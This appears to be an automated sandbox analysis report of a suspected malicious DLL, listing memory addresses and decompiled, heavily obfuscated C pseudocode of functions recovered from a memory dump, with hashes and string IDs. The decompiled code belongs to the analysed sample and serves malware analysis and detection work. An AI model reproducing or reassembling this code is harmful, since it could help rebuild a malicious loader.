                                                                                                                                                                            0x02f56c36
                                                                                                                                                                            0x02f56c3a
                                                                                                                                                                            0x02f56c42
                                                                                                                                                                            0x02f56c4a
                                                                                                                                                                            0x02f56c52
                                                                                                                                                                            0x02f56c5a
                                                                                                                                                                            0x02f56c62
                                                                                                                                                                            0x02f56c72
                                                                                                                                                                            0x02f56c76
                                                                                                                                                                            0x02f56c7e
                                                                                                                                                                            0x02f56c86
                                                                                                                                                                            0x02f56c92
                                                                                                                                                                            0x02f56c97
                                                                                                                                                                            0x02f56c9d
                                                                                                                                                                            0x02f56ca2
                                                                                                                                                                            0x02f56caa
                                                                                                                                                                            0x02f56cb6
                                                                                                                                                                            0x02f56cb9
                                                                                                                                                                            0x02f56cbd
                                                                                                                                                                            0x02f56cc2
                                                                                                                                                                            0x02f56cc7
                                                                                                                                                                            0x02f56ccf
                                                                                                                                                                            0x02f56cd7
                                                                                                                                                                            0x02f56cdc
                                                                                                                                                                            0x02f56ce4
                                                                                                                                                                            0x02f56cec
                                                                                                                                                                            0x02f56cf4
                                                                                                                                                                            0x02f56cf9
                                                                                                                                                                            0x02f56cfe
                                                                                                                                                                            0x02f56d06
                                                                                                                                                                            0x02f56d0e
                                                                                                                                                                            0x02f56d13
                                                                                                                                                                            0x02f56d1b
                                                                                                                                                                            0x02f56d23
                                                                                                                                                                            0x02f56d2d
                                                                                                                                                                            0x02f56d35
                                                                                                                                                                            0x02f56d3d
                                                                                                                                                                            0x02f56d45
                                                                                                                                                                            0x02f56d4d
                                                                                                                                                                            0x02f56d55
                                                                                                                                                                            0x02f56d5d
                                                                                                                                                                            0x02f56d63
                                                                                                                                                                            0x02f56d66
                                                                                                                                                                            0x02f56d68
                                                                                                                                                                            0x02f56d6e
                                                                                                                                                                            0x02f56d7a
                                                                                                                                                                            0x02f56d7f
                                                                                                                                                                            0x02f56d85
                                                                                                                                                                            0x02f56d8d
                                                                                                                                                                            0x02f56d99
                                                                                                                                                                            0x02f56d9e
                                                                                                                                                                            0x02f56da4
                                                                                                                                                                            0x02f56dac
                                                                                                                                                                            0x02f56db4
                                                                                                                                                                            0x02f56db9
                                                                                                                                                                            0x02f56dc1
                                                                                                                                                                            0x02f56dc6
                                                                                                                                                                            0x02f56dce
                                                                                                                                                                            0x02f56dd6
                                                                                                                                                                            0x02f56dde
                                                                                                                                                                            0x02f56de3
                                                                                                                                                                            0x02f56deb
                                                                                                                                                                            0x02f56df3
                                                                                                                                                                            0x02f56e00
                                                                                                                                                                            0x02f56e01
                                                                                                                                                                            0x02f56e05
                                                                                                                                                                            0x02f56e0d
                                                                                                                                                                            0x02f56e20
                                                                                                                                                                            0x02f56e24
                                                                                                                                                                            0x02f56e2c
                                                                                                                                                                            0x02f56e34
                                                                                                                                                                            0x02f56e3c
                                                                                                                                                                            0x02f56e44
                                                                                                                                                                            0x02f56e4c
                                                                                                                                                                            0x02f56e54
                                                                                                                                                                            0x02f56e5c
                                                                                                                                                                            0x02f56e64
                                                                                                                                                                            0x02f56e6c
                                                                                                                                                                            0x02f56e74
                                                                                                                                                                            0x02f56e7c
                                                                                                                                                                            0x02f56e84
                                                                                                                                                                            0x02f56e91
                                                                                                                                                                            0x02f56e95
                                                                                                                                                                            0x02f56e9d
                                                                                                                                                                            0x02f56ea5
                                                                                                                                                                            0x02f56ead
                                                                                                                                                                            0x02f56eb5
                                                                                                                                                                            0x02f56ebd
                                                                                                                                                                            0x02f56ecb
                                                                                                                                                                            0x02f5702a
                                                                                                                                                                            0x02f5702f
                                                                                                                                                                            0x02f57034
                                                                                                                                                                            0x02f5706b
                                                                                                                                                                            0x02f57077
                                                                                                                                                                            0x02f57077
                                                                                                                                                                            0x02f57036
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57036
                                                                                                                                                                            0x02f56ed7
                                                                                                                                                                            0x02f57004
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57004
                                                                                                                                                                            0x02f56ee3
                                                                                                                                                                            0x02f56f94
                                                                                                                                                                            0x02f56f99
                                                                                                                                                                            0x02f56f9e
                                                                                                                                                                            0x02f56fa3
                                                                                                                                                                            0x02f56fb5
                                                                                                                                                                            0x02f56fb6
                                                                                                                                                                            0x02f56fbe
                                                                                                                                                                            0x02f56fc3
                                                                                                                                                                            0x02f56fc6
                                                                                                                                                                            0x02f56fca
                                                                                                                                                                            0x02f56fe8
                                                                                                                                                                            0x02f56ff6
                                                                                                                                                                            0x02f56ff9
                                                                                                                                                                            0x02f56ffc
                                                                                                                                                                            0x02f56ffc
                                                                                                                                                                            0x02f56fca
                                                                                                                                                                            0x02f56ffd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56ffd
                                                                                                                                                                            0x02f56eef
                                                                                                                                                                            0x02f56f62
                                                                                                                                                                            0x02f56f67
                                                                                                                                                                            0x02f56f6e
                                                                                                                                                                            0x02f56f76
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56f76
                                                                                                                                                                            0x02f56ef7
                                                                                                                                                                            0x02f5705f
                                                                                                                                                                            0x02f57065
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57065
                                                                                                                                                                            0x02f56efd
                                                                                                                                                                            0x02f56f00
                                                                                                                                                                            0x02f56f02
                                                                                                                                                                            0x02f56f07
                                                                                                                                                                            0x02f56f0b
                                                                                                                                                                            0x02f56f15
                                                                                                                                                                            0x02f56f12
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56f14
                                                                                                                                                                            0x02f56f14
                                                                                                                                                                            0x02f56f19
                                                                                                                                                                            0x02f56f1b
                                                                                                                                                                            0x02f56f1f
                                                                                                                                                                            0x02f56f39
                                                                                                                                                                            0x02f56f39
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56f39
                                                                                                                                                                            0x02f56f21
                                                                                                                                                                            0x02f56f33
                                                                                                                                                                            0x02f56f33
                                                                                                                                                                            0x02f56f37
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56f37
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f56f21
                                                                                                                                                                            0x02f57053
                                                                                                                                                                            0x02f5705a
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
                                                                                                                                                                            • API String ID: 0-1112794312
                                                                                                                                                                            • Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                                                                                                                                                                            • Instruction ID: 2d7cc8f597df77f813887f7aebfd2ab242a8137562b5f11026107e8142207a39
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                                                                                                                                                                            • Instruction Fuzzy Hash: FDC133715093808FD368CF66C949A1BFBF2FBC5748F50891DFA9686260D7B18949CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F6DC71() {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				void* _t246;
                                                                                                                                                                            				intOrPtr* _t248;
                                                                                                                                                                            				signed int _t254;
                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                            				intOrPtr* _t256;
                                                                                                                                                                            				signed int _t257;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				signed int _t259;
                                                                                                                                                                            				signed int _t260;
                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                            				signed int _t262;
                                                                                                                                                                            				void* _t263;
                                                                                                                                                                            				void* _t290;
                                                                                                                                                                            				signed int* _t294;
                                                                                                                                                                            
                                                                                                                                                                            				_t294 =  &_v108;
                                                                                                                                                                            				_v28 = 0x1aa6a3;
                                                                                                                                                                            				_v28 = _v28 >> 4;
                                                                                                                                                                            				_v28 = _v28 ^ 0x8001aa6b;
                                                                                                                                                                            				_v68 = 0xf966b1;
                                                                                                                                                                            				_v68 = _v68 | 0xf5f58fdd;
                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                            				_t290 = 0xa5173af;
                                                                                                                                                                            				_t257 = 0x26;
                                                                                                                                                                            				_v68 = _v68 / _t257;
                                                                                                                                                                            				_v68 = _v68 ^ 0x0679357b;
                                                                                                                                                                            				_v108 = 0xb8ff00;
                                                                                                                                                                            				_v108 = _v108 | 0x28c12dd3;
                                                                                                                                                                            				_t258 = 0x42;
                                                                                                                                                                            				_v108 = _v108 / _t258;
                                                                                                                                                                            				_v108 = _v108 + 0x2548;
                                                                                                                                                                            				_v108 = _v108 ^ 0x0093f641;
                                                                                                                                                                            				_v80 = 0x4a20cb;
                                                                                                                                                                            				_v80 = _v80 | 0x50657e73;
                                                                                                                                                                            				_v80 = _v80 >> 7;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00ac2c39;
                                                                                                                                                                            				_v84 = 0x6237d1;
                                                                                                                                                                            				_v84 = _v84 ^ 0x87c50ead;
                                                                                                                                                                            				_v84 = _v84 << 4;
                                                                                                                                                                            				_v84 = _v84 ^ 0x7a73b039;
                                                                                                                                                                            				_v88 = 0x617a8;
                                                                                                                                                                            				_v88 = _v88 << 0xa;
                                                                                                                                                                            				_v88 = _v88 >> 0xc;
                                                                                                                                                                            				_v88 = _v88 ^ 0x00004866;
                                                                                                                                                                            				_v96 = 0x113f2;
                                                                                                                                                                            				_v96 = _v96 + 0x334b;
                                                                                                                                                                            				_v96 = _v96 << 0xb;
                                                                                                                                                                            				_v96 = _v96 ^ 0x0285e17a;
                                                                                                                                                                            				_v96 = _v96 ^ 0x08b84672;
                                                                                                                                                                            				_v60 = 0x4bd9b6;
                                                                                                                                                                            				_v60 = _v60 ^ 0x6ba7848f;
                                                                                                                                                                            				_v60 = _v60 | 0xa40fa4df;
                                                                                                                                                                            				_v60 = _v60 ^ 0xefe49c55;
                                                                                                                                                                            				_v100 = 0xb12c48;
                                                                                                                                                                            				_v100 = _v100 >> 0xf;
                                                                                                                                                                            				_v100 = _v100 ^ 0x0d420031;
                                                                                                                                                                            				_t259 = 0x33;
                                                                                                                                                                            				_v100 = _v100 / _t259;
                                                                                                                                                                            				_v100 = _v100 ^ 0x004184fb;
                                                                                                                                                                            				_v104 = 0x387c2e;
                                                                                                                                                                            				_v104 = _v104 << 5;
                                                                                                                                                                            				_t260 = 0x72;
                                                                                                                                                                            				_v104 = _v104 / _t260;
                                                                                                                                                                            				_v104 = _v104 >> 0xc;
                                                                                                                                                                            				_v104 = _v104 ^ 0x0003fa0e;
                                                                                                                                                                            				_v64 = 0x9254d3;
                                                                                                                                                                            				_v64 = _v64 ^ 0xec8ec683;
                                                                                                                                                                            				_v64 = _v64 + 0xffff5a55;
                                                                                                                                                                            				_v64 = _v64 ^ 0xec1fa99d;
                                                                                                                                                                            				_v72 = 0xb608b;
                                                                                                                                                                            				_v72 = _v72 + 0xffffc85a;
                                                                                                                                                                            				_t261 = 0x43;
                                                                                                                                                                            				_v72 = _v72 / _t261;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00012617;
                                                                                                                                                                            				_v32 = 0x2b47af;
                                                                                                                                                                            				_t262 = 0x73;
                                                                                                                                                                            				_t254 = _v4;
                                                                                                                                                                            				_v32 = _v32 / _t262;
                                                                                                                                                                            				_v32 = _v32 ^ 0x0007dbbc;
                                                                                                                                                                            				_v76 = 0xa2cc58;
                                                                                                                                                                            				_v76 = _v76 * 0x79;
                                                                                                                                                                            				_v76 = _v76 + 0x1556;
                                                                                                                                                                            				_v76 = _v76 ^ 0x4cf4e816;
                                                                                                                                                                            				_v36 = 0x411f8a;
                                                                                                                                                                            				_v36 = _v36 ^ 0x039a7593;
                                                                                                                                                                            				_v36 = _v36 ^ 0x03d0076c;
                                                                                                                                                                            				_v48 = 0x32f559;
                                                                                                                                                                            				_v48 = _v48 + 0x88cf;
                                                                                                                                                                            				_v48 = _v48 >> 4;
                                                                                                                                                                            				_v48 = _v48 ^ 0x000c1178;
                                                                                                                                                                            				_v92 = 0xe53134;
                                                                                                                                                                            				_v92 = _v92 + 0xffffd6c4;
                                                                                                                                                                            				_v92 = _v92 + 0xfffff637;
                                                                                                                                                                            				_v92 = _v92 ^ 0x9e819fd3;
                                                                                                                                                                            				_v92 = _v92 ^ 0x9e661668;
                                                                                                                                                                            				_v52 = 0x962c48;
                                                                                                                                                                            				_v52 = _v52 + 0x54df;
                                                                                                                                                                            				_v52 = _v52 << 4;
                                                                                                                                                                            				_v52 = _v52 ^ 0x096c20fe;
                                                                                                                                                                            				_v56 = 0x38983;
                                                                                                                                                                            				_v56 = _v56 * 0x7b;
                                                                                                                                                                            				_v56 = _v56 ^ 0x1e2e8742;
                                                                                                                                                                            				_v56 = _v56 ^ 0x1f9fc20c;
                                                                                                                                                                            				_v20 = 0x39c3;
                                                                                                                                                                            				_v20 = _v20 ^ 0xdc0c04ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0xdc0d303f;
                                                                                                                                                                            				_v44 = 0xdd799f;
                                                                                                                                                                            				_v44 = _v44 + 0xffffa96c;
                                                                                                                                                                            				_v44 = _v44 >> 0xc;
                                                                                                                                                                            				_v44 = _v44 ^ 0x0003bcd5;
                                                                                                                                                                            				_v24 = 0x7b2b38;
                                                                                                                                                                            				_v24 = _v24 * 0x48;
                                                                                                                                                                            				_v24 = _v24 ^ 0x22aaeece;
                                                                                                                                                                            				_v40 = 0x38897c;
                                                                                                                                                                            				_v40 = _v40 >> 0xe;
                                                                                                                                                                            				_v40 = _v40 | 0xf4a0afb0;
                                                                                                                                                                            				_v40 = _v40 ^ 0xf4ac49e4;
                                                                                                                                                                            				_v12 = 0x92ab49;
                                                                                                                                                                            				_v12 = _v12 ^ 0x4b1e6875;
                                                                                                                                                                            				_v12 = _v12 ^ 0x4b80c344;
                                                                                                                                                                            				_v16 = 0x5228cc;
                                                                                                                                                                            				_v16 = _v16 | 0xaae3d00d;
                                                                                                                                                                            				_v16 = _v16 ^ 0xaaf963f0;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t263 = 0x5c;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t246 = 0xc02063;
                                                                                                                                                                            						do {
                                                                                                                                                                            							L3:
                                                                                                                                                                            							while(_t290 != 0x13579) {
                                                                                                                                                                            								if(_t290 == _t246) {
                                                                                                                                                                            									_t248 = E02F7298D(_v20, _v44, _v24, _v8, _t254);
                                                                                                                                                                            									_t294 =  &(_t294[3]);
                                                                                                                                                                            									__eflags = _t248;
                                                                                                                                                                            									_t290 = 0x13579;
                                                                                                                                                                            									_v4 = 0 | __eflags == 0x00000000;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t290 == 0x79b4c83) {
                                                                                                                                                                            										_push(_v88);
                                                                                                                                                                            										_push(_v84);
                                                                                                                                                                            										_push(_v80);
                                                                                                                                                                            										__eflags = E02F52DEA(_v96,  &_v8, _v60, 0x2f510a0, _v28, _v100, 0x2f510a0, 0x2f510a0, _v104, _v64, 0x2f510a0, 0x2f510a0, _v68, _v72, _v32, _v76, _v36, E02F6E1F8(0x2f510a0, _v108, __eflags));
                                                                                                                                                                            										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
                                                                                                                                                                            										E02F6FECB(_t249, _v48, _v92, _v52, _v56);
                                                                                                                                                                            										_t294 =  &(_t294[0x16]);
                                                                                                                                                                            										L16:
                                                                                                                                                                            										_t246 = 0xc02063;
                                                                                                                                                                            										_t263 = 0x5c;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t290 == 0xa5173af) {
                                                                                                                                                                            											_t290 = 0xac8592e;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t290 == 0xac8592e) {
                                                                                                                                                                            												_t255 =  *0x2f76214; // 0x0
                                                                                                                                                                            												_t256 = _t255 + 0x23c;
                                                                                                                                                                            												while( *_t256 != _t263) {
                                                                                                                                                                            													_t256 = _t256 + 2;
                                                                                                                                                                            													__eflags = _t256;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t254 = _t256 + 2;
                                                                                                                                                                            												_t290 = 0x79b4c83;
                                                                                                                                                                            												_t246 = 0xc02063;
                                                                                                                                                                            												continue;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							E02F553D0(_v40, _v12, _v16, _v8);
                                                                                                                                                                            							_t290 = 0x61b9dc3;
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            							L17:
                                                                                                                                                                            							__eflags = _t290 - 0x61b9dc3;
                                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                                            						return _v4;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}












































                                                                                                                                                                            0x02f6dc71
                                                                                                                                                                            0x02f6dc74
                                                                                                                                                                            0x02f6dc7e
                                                                                                                                                                            0x02f6dc85
                                                                                                                                                                            0x02f6dc8d
                                                                                                                                                                            0x02f6dc95
                                                                                                                                                                            0x02f6dca1
                                                                                                                                                                            0x02f6dca5
                                                                                                                                                                            0x02f6dcb0
                                                                                                                                                                            0x02f6dcb5
                                                                                                                                                                            0x02f6dcbb
                                                                                                                                                                            0x02f6dcc3
                                                                                                                                                                            0x02f6dccb
                                                                                                                                                                            0x02f6dcd7
                                                                                                                                                                            0x02f6dcdc
                                                                                                                                                                            0x02f6dce2
                                                                                                                                                                            0x02f6dcea
                                                                                                                                                                            0x02f6dcf2
                                                                                                                                                                            0x02f6dcfa
                                                                                                                                                                            0x02f6dd02
                                                                                                                                                                            0x02f6dd07
                                                                                                                                                                            0x02f6dd0f
                                                                                                                                                                            0x02f6dd17
                                                                                                                                                                            0x02f6dd1f
                                                                                                                                                                            0x02f6dd24
                                                                                                                                                                            0x02f6dd2c
                                                                                                                                                                            0x02f6dd34
                                                                                                                                                                            0x02f6dd39
                                                                                                                                                                            0x02f6dd3e
                                                                                                                                                                            0x02f6dd46
                                                                                                                                                                            0x02f6dd4e
                                                                                                                                                                            0x02f6dd56
                                                                                                                                                                            0x02f6dd5b
                                                                                                                                                                            0x02f6dd63
                                                                                                                                                                            0x02f6dd6b
                                                                                                                                                                            0x02f6dd73
                                                                                                                                                                            0x02f6dd7b
                                                                                                                                                                            0x02f6dd83
                                                                                                                                                                            0x02f6dd8b
                                                                                                                                                                            0x02f6dd93
                                                                                                                                                                            0x02f6dd98
                                                                                                                                                                            0x02f6dda4
                                                                                                                                                                            0x02f6dda9
                                                                                                                                                                            0x02f6ddaf
                                                                                                                                                                            0x02f6ddb7
                                                                                                                                                                            0x02f6ddbf
                                                                                                                                                                            0x02f6ddc8
                                                                                                                                                                            0x02f6ddcd
                                                                                                                                                                            0x02f6ddd3
                                                                                                                                                                            0x02f6ddd8
                                                                                                                                                                            0x02f6dde0
                                                                                                                                                                            0x02f6dde8
                                                                                                                                                                            0x02f6ddf0
                                                                                                                                                                            0x02f6ddf8
                                                                                                                                                                            0x02f6de00
                                                                                                                                                                            0x02f6de08
                                                                                                                                                                            0x02f6de14
                                                                                                                                                                            0x02f6de17
                                                                                                                                                                            0x02f6de1d
                                                                                                                                                                            0x02f6de2a
                                                                                                                                                                            0x02f6de38
                                                                                                                                                                            0x02f6de3b
                                                                                                                                                                            0x02f6de3f
                                                                                                                                                                            0x02f6de43
                                                                                                                                                                            0x02f6de4b
                                                                                                                                                                            0x02f6de58
                                                                                                                                                                            0x02f6de5c
                                                                                                                                                                            0x02f6de64
                                                                                                                                                                            0x02f6de6c
                                                                                                                                                                            0x02f6de74
                                                                                                                                                                            0x02f6de7c
                                                                                                                                                                            0x02f6de84
                                                                                                                                                                            0x02f6de8c
                                                                                                                                                                            0x02f6de94
                                                                                                                                                                            0x02f6de99
                                                                                                                                                                            0x02f6dea1
                                                                                                                                                                            0x02f6dea9
                                                                                                                                                                            0x02f6deb1
                                                                                                                                                                            0x02f6deb9
                                                                                                                                                                            0x02f6dec1
                                                                                                                                                                            0x02f6dec9
                                                                                                                                                                            0x02f6ded1
                                                                                                                                                                            0x02f6ded9
                                                                                                                                                                            0x02f6dede
                                                                                                                                                                            0x02f6dee6
                                                                                                                                                                            0x02f6def3
                                                                                                                                                                            0x02f6def7
                                                                                                                                                                            0x02f6deff
                                                                                                                                                                            0x02f6df07
                                                                                                                                                                            0x02f6df0f
                                                                                                                                                                            0x02f6df17
                                                                                                                                                                            0x02f6df1f
                                                                                                                                                                            0x02f6df27
                                                                                                                                                                            0x02f6df2f
                                                                                                                                                                            0x02f6df34
                                                                                                                                                                            0x02f6df3c
                                                                                                                                                                            0x02f6df49
                                                                                                                                                                            0x02f6df4d
                                                                                                                                                                            0x02f6df55
                                                                                                                                                                            0x02f6df5d
                                                                                                                                                                            0x02f6df62
                                                                                                                                                                            0x02f6df6a
                                                                                                                                                                            0x02f6df72
                                                                                                                                                                            0x02f6df7a
                                                                                                                                                                            0x02f6df82
                                                                                                                                                                            0x02f6df8a
                                                                                                                                                                            0x02f6df92
                                                                                                                                                                            0x02f6df9a
                                                                                                                                                                            0x02f6dfa2
                                                                                                                                                                            0x02f6dfa2
                                                                                                                                                                            0x02f6dfa4
                                                                                                                                                                            0x02f6dfa5
                                                                                                                                                                            0x02f6dfa5
                                                                                                                                                                            0x02f6dfaa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dfaa
                                                                                                                                                                            0x02f6dfb8
                                                                                                                                                                            0x02f6e0a0
                                                                                                                                                                            0x02f6e0a7
                                                                                                                                                                            0x02f6e0aa
                                                                                                                                                                            0x02f6e0ac
                                                                                                                                                                            0x02f6e0b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dfbe
                                                                                                                                                                            0x02f6dfc4
                                                                                                                                                                            0x02f6e001
                                                                                                                                                                            0x02f6e00a
                                                                                                                                                                            0x02f6e00e
                                                                                                                                                                            0x02f6e065
                                                                                                                                                                            0x02f6e082
                                                                                                                                                                            0x02f6e085
                                                                                                                                                                            0x02f6e08a
                                                                                                                                                                            0x02f6e0d6
                                                                                                                                                                            0x02f6e0d8
                                                                                                                                                                            0x02f6e0dd
                                                                                                                                                                            0x02f6dfc6
                                                                                                                                                                            0x02f6dfcc
                                                                                                                                                                            0x02f6dffa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dfce
                                                                                                                                                                            0x02f6dfd4
                                                                                                                                                                            0x02f6dfda
                                                                                                                                                                            0x02f6dfe0
                                                                                                                                                                            0x02f6dfeb
                                                                                                                                                                            0x02f6dfe8
                                                                                                                                                                            0x02f6dfe8
                                                                                                                                                                            0x02f6dfe8
                                                                                                                                                                            0x02f6dff0
                                                                                                                                                                            0x02f6dff3
                                                                                                                                                                            0x02f6dfa5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dfa5
                                                                                                                                                                            0x02f6dfd4
                                                                                                                                                                            0x02f6dfcc
                                                                                                                                                                            0x02f6dfc4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dfb8
                                                                                                                                                                            0x02f6e0cd
                                                                                                                                                                            0x02f6e0d4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6e0de
                                                                                                                                                                            0x02f6e0de
                                                                                                                                                                            0x02f6e0de
                                                                                                                                                                            0x02f6e0f1
                                                                                                                                                                            0x02f6e0f1
                                                                                                                                                                            0x02f6dfa5

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .|8$1$41$8+{$H%$fH$s~eP
                                                                                                                                                                            • API String ID: 0-3664284304
                                                                                                                                                                            • Opcode ID: c70a086059509e69e9887dbe124cc073cf0fa5e73de7da3814da82a9dc200a63
                                                                                                                                                                            • Instruction ID: 131b05e1f90649a63bbc645bab416206eba30d494c49a77282c6e1dd48266590
                                                                                                                                                                            • Opcode Fuzzy Hash: c70a086059509e69e9887dbe124cc073cf0fa5e73de7da3814da82a9dc200a63
                                                                                                                                                                            • Instruction Fuzzy Hash: 39B122725083809FD368CF25D88991BFBE2FBC4788F10891DF69A86260D7B58949CF47
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F5670B() {
                                                                                                                                                                            				char _v524;
                                                                                                                                                                            				intOrPtr _v548;
                                                                                                                                                                            				char _v564;
                                                                                                                                                                            				intOrPtr _v568;
                                                                                                                                                                            				intOrPtr _v572;
                                                                                                                                                                            				intOrPtr _v576;
                                                                                                                                                                            				intOrPtr _v584;
                                                                                                                                                                            				char _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				signed int _v608;
                                                                                                                                                                            				signed int _v612;
                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                            				signed int _v620;
                                                                                                                                                                            				signed int _v624;
                                                                                                                                                                            				signed int _v628;
                                                                                                                                                                            				signed int _v632;
                                                                                                                                                                            				signed int _v636;
                                                                                                                                                                            				signed int _v640;
                                                                                                                                                                            				signed int _v644;
                                                                                                                                                                            				signed int _v648;
                                                                                                                                                                            				signed int _v652;
                                                                                                                                                                            				signed int _v656;
                                                                                                                                                                            				signed int _v660;
                                                                                                                                                                            				signed int _v664;
                                                                                                                                                                            				signed int _v668;
                                                                                                                                                                            				signed int _v672;
                                                                                                                                                                            				signed int _v676;
                                                                                                                                                                            				signed int _v680;
                                                                                                                                                                            				void* _t233;
                                                                                                                                                                            				signed int _t236;
                                                                                                                                                                            				signed int _t238;
                                                                                                                                                                            				void* _t239;
                                                                                                                                                                            				signed int _t241;
                                                                                                                                                                            				signed int _t242;
                                                                                                                                                                            				signed int _t243;
                                                                                                                                                                            				signed int _t244;
                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                            				intOrPtr _t259;
                                                                                                                                                                            				void* _t261;
                                                                                                                                                                            				void* _t266;
                                                                                                                                                                            				void* _t268;
                                                                                                                                                                            
                                                                                                                                                                            				_v576 = 0x5c6bdc;
                                                                                                                                                                            				_v572 = 0xae866a;
                                                                                                                                                                            				_t259 = 0;
                                                                                                                                                                            				_t261 = 0xb8e9ee3;
                                                                                                                                                                            				_v568 = 0;
                                                                                                                                                                            				_v612 = 0xec3aec;
                                                                                                                                                                            				_t5 =  &_v612; // 0xec3aec
                                                                                                                                                                            				_t241 = 0x62;
                                                                                                                                                                            				_v612 =  *_t5 * 0x6c;
                                                                                                                                                                            				_v612 = _v612 | 0xdabeec40;
                                                                                                                                                                            				_v612 = _v612 ^ 0xfbbeff50;
                                                                                                                                                                            				_v604 = 0x37b038;
                                                                                                                                                                            				_v604 = _v604 >> 0xd;
                                                                                                                                                                            				_v604 = _v604 ^ 0x000001bc;
                                                                                                                                                                            				_v624 = 0x7f5f56;
                                                                                                                                                                            				_v624 = _v624 + 0xffff5a99;
                                                                                                                                                                            				_v624 = _v624 << 4;
                                                                                                                                                                            				_v624 = _v624 ^ 0x07eb9ef3;
                                                                                                                                                                            				_v628 = 0x55d92;
                                                                                                                                                                            				_v628 = _v628 >> 0x10;
